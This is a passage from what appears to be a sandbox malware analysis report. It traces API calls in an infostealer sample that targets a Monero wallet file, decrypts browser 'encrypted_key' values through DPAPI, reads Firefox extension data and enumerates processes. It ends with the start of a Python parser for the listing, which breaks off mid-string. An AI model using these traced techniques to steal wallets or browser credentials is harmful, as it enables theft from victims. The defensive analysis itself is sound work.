                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: dc26f170ace6caa5789b116a072cb0376deabdcb65ff1a73f126237a9b0079d6
                                        • Instruction ID: 43e0ad26ac179f573eaafc0c5aa44b97fa7d8433904cba9514f034d845688def
                                        • Opcode Fuzzy Hash: dc26f170ace6caa5789b116a072cb0376deabdcb65ff1a73f126237a9b0079d6
                                        • Instruction Fuzzy Hash: D9E04670A48208BBDB04DBA4DD0AFAD7BB8FB84301F008294FD0996380DA759A00CBA5
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004EAA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 004EAB2F
                                        • lstrlen.KERNEL32(00000000), ref: 004EADEC
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 004EAE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: a86f723ab0ab9a33ffe4a728225bc7b099bc2458e80c261db7c3c28dc3b2d56c
                                        • Instruction ID: 2918081e4041d2b2c9575b1f5f14fc917d1c7b88344e5b4d3d4d8348a7884a1c
                                        • Opcode Fuzzy Hash: a86f723ab0ab9a33ffe4a728225bc7b099bc2458e80c261db7c3c28dc3b2d56c
                                        • Instruction Fuzzy Hash: E4E1D1B291010C9BCB04EBA5DDA5EFE7339AF54304F50855EF21A62091DF387A5CCB6A
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004ED581
                                        • lstrlen.KERNEL32(00000000), ref: 004ED798
                                        • lstrlen.KERNEL32(00000000), ref: 004ED7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 004ED82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: ee70e763bfb40669cf219e10de0820d11feaa6d84abd1f0cd2d0b3a2d617e77b
                                        • Instruction ID: 76b03a16cc6133df58d35fbdb1cf0b9a47300fbe65b22bae8cdc93da51b6ccfc
                                        • Opcode Fuzzy Hash: ee70e763bfb40669cf219e10de0820d11feaa6d84abd1f0cd2d0b3a2d617e77b
                                        • Instruction Fuzzy Hash: 3991E7B291010C9BCB04FBA5DC96EFE7339AF54304F50455EF21A66191EF387A18CB6A
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004ED901
                                        • lstrlen.KERNEL32(00000000), ref: 004EDA9F
                                        • lstrlen.KERNEL32(00000000), ref: 004EDAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 004EDB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 8ef79b1fc30cae878e7924f43099dfcc6ca490a7b54ba8cec6c3e00aca5d898c
                                        • Instruction ID: 3e937c0cf9f08a353fcfe7c93181b6b02d7c3519e6dcaa08fd23e3d63acc0fcb
                                        • Opcode Fuzzy Hash: 8ef79b1fc30cae878e7924f43099dfcc6ca490a7b54ba8cec6c3e00aca5d898c
                                        • Instruction Fuzzy Hash: 1581E6B191010C9BCB04FBA5DCA6EFE7339AF54304F40455EF21A66191EF387A18CB6A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: 4edd928de7331c23b1e368dcef165b87e4385cf14b9b871b721b2b5f832b272a
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 5551C372500206AFEB298F54C869BBB7FA5FF41312F24452EED0687991E731ED44DB90
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004EA664
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: b1bdeb5edb35497b3d8d48cb1dd551592d5f481e602b8562523e1b3208e5c455
                                        • Instruction ID: 07e26babe9157221fd929891bc9a7b15bf97c5cc274526c68b805e21af8f2019
                                        • Opcode Fuzzy Hash: b1bdeb5edb35497b3d8d48cb1dd551592d5f481e602b8562523e1b3208e5c455
                                        • Instruction Fuzzy Hash: 60516D70A0024CEFDB14DFA5CD96FED7775BF40344F008019EA0A5B291DB78AA15CB5A
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00501678,00500D93), ref: 004EF64C
                                        • lstrlen.KERNEL32(00000000), ref: 004EF66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: e0a8781fd184ca59a91e6e17172f79686a403d0204450fc086b5ba77a4f41dca
                                        • Instruction ID: 0b2639e3b37bc0a8b75b866b56847cc46098f197249f4510adcc2c269a8a7567
                                        • Opcode Fuzzy Hash: e0a8781fd184ca59a91e6e17172f79686a403d0204450fc086b5ba77a4f41dca
                                        • Instruction Fuzzy Hash: 43512FB2D0010C9ACB04FBA5DD96DFD7339AF54304F00856EF61A67195EE386A1CCB6A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: fb7bb41d6d9e99051ec075da613f343bc2dad5b9346805acf67ac6dcb32cba0b
                                        • Instruction ID: 7b4f9eb829b45eea3a565bcbe4bb4113e5e9d0eeceecd88c133b6e964263715c
                                        • Opcode Fuzzy Hash: fb7bb41d6d9e99051ec075da613f343bc2dad5b9346805acf67ac6dcb32cba0b
                                        • Instruction Fuzzy Hash: B1412DB1D0010D9BCB04EFA5D855EFEB778AF44305F00801EF61676291EB78AA15CBAA
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004EA489
                                          • Part of subcall function 004EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA23F
                                          • Part of subcall function 004EA210: LocalAlloc.KERNEL32(00000040,?,?,?,004E4F3E,00000000,?), ref: 004EA251
                                          • Part of subcall function 004EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA27A
                                          • Part of subcall function 004EA210: LocalFree.KERNEL32(?,?,?,?,004E4F3E,00000000,?), ref: 004EA28F
                                          • Part of subcall function 004EA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004EA2D4
                                          • Part of subcall function 004EA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 004EA2F3
                                          • Part of subcall function 004EA2B0: LocalFree.KERNEL32(?), ref: 004EA323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: f718b4ea12e9f07ae474e0a2937c7ba4333eac145069894b4f66beff48532a57
                                        • Instruction ID: 9ba75c58579066c5ac069ec82a84e265d5ac085ced1eb31d3987ed3e96564848
                                        • Opcode Fuzzy Hash: f718b4ea12e9f07ae474e0a2937c7ba4333eac145069894b4f66beff48532a57
                                        • Instruction Fuzzy Hash: 2D3160B6D00108ABCF04DB95DC45AFFB7B8AB58305F444919E901A7245E734AA14CB66
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005005BF), ref: 004F885A
                                        • Process32First.KERNEL32(?,00000128), ref: 004F886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 004F8883
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • CloseHandle.KERNEL32(?), ref: 004F88F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 154eefe186d5a23e879bb6794bf45a60d067ba3b787525b38a51c2bb2a6a5bb1
                                        • Instruction ID: 8375212d6c234312dfd92c950ea31c57ab93db3dfb106dd21b615ac5396fc0ce
                                        • Opcode Fuzzy Hash: 154eefe186d5a23e879bb6794bf45a60d067ba3b787525b38a51c2bb2a6a5bb1
                                        • Instruction Fuzzy Hash: 7B312BB190111CABCB24EB95CC55FEEB778FB45744F10419EF20EA61A0DB386A44CFA5
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0055FE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0055FE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 83c85681573846bd7ec83f7e60c419efec1e9569b5f2148e8d06c7647ca64d2e
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: BC01F53210ABA2EEFAB416745CDE96A3E48FB413B2734473AF912811F2EF514C459344
                                        APIs
                                        • __getptd.LIBCMT ref: 004FCA7E
                                          • Part of subcall function 004FC2A0: __amsg_exit.LIBCMT ref: 004FC2B0
                                        • __getptd.LIBCMT ref: 004FCA95
                                        • __amsg_exit.LIBCMT ref: 004FCAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 004FCAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 96b287399e92011511dcad94a4e7daaf98c1bdad4bc4ac34d64b8d7fa281c480
                                        • Instruction ID: 7cb1af989952c1a070741b45537cc0c49e32ec7c0c26cc7e8b2ca80abb5acbd2
                                        • Opcode Fuzzy Hash: 96b287399e92011511dcad94a4e7daaf98c1bdad4bc4ac34d64b8d7fa281c480
                                        • Instruction Fuzzy Hash: CAF06231E4431D9BD621FBA9998677E36A0EF01718F11414FE604962D2CB6C694096DE
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: 4c9c51c7120a8f987f7f39baeabcead1ceeb5c49ef32d10a1a77b26da3f7b8b0
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: A0417872900209AFCF16DF98DC81AAEBFB5FF58300F189099F905A7291E3359A50DF60
                                        APIs
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F51CA
                                        • lstrcat.KERNEL32(?,00501058), ref: 004F51E7
                                        • lstrcat.KERNEL32(?,01459030), ref: 004F51FB
                                        • lstrcat.KERNEL32(?,0050105C), ref: 004F520D
                                          • Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4B7C
                                          • Part of subcall function 004F4B60: FindFirstFileA.KERNEL32(?,?), ref: 004F4B93
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC4), ref: 004F4BC1
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC8), ref: 004F4BD7
                                          • Part of subcall function 004F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004F4DCD
                                          • Part of subcall function 004F4B60: FindClose.KERNEL32(000000FF), ref: 004F4DE2
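The call listing above is the signature of a path-builder plus directory walker: a special folder is resolved with SHGetFolderPathA (CSIDL argument 0x1C), a path is assembled with repeated lstrcat, and a subcall loops over FindFirstFileA/FindNextFileA/FindClose with two StrCmpCA checks per entry. The parser below is an added example for triaging such listings; it is not part of the Joe Sandbox report or of the sample. The input is copied from the listing above, the CSIDL names come from Shlobj.h, and the reading of the two StrCmpCA constants as the usual "." / ".." skip is an assumption, since the report does not resolve those string addresses.

```python
"""Parse a Joe Sandbox per-function API listing and summarise what the function does."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the API lines of the lstrcat/Find* function from the report above.
REPORT_LINES = """\
• Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
• lstrcat.KERNEL32(?,00000000), ref: 004F51CA
• lstrcat.KERNEL32(?,00501058), ref: 004F51E7
• lstrcat.KERNEL32(?,01459030), ref: 004F51FB
• lstrcat.KERNEL32(?,0050105C), ref: 004F520D
• Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4B7C
• Part of subcall function 004F4B60: FindFirstFileA.KERNEL32(?,?), ref: 004F4B93
• Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC4), ref: 004F4BC1
• Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC8), ref: 004F4BD7
• Part of subcall function 004F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004F4DCD
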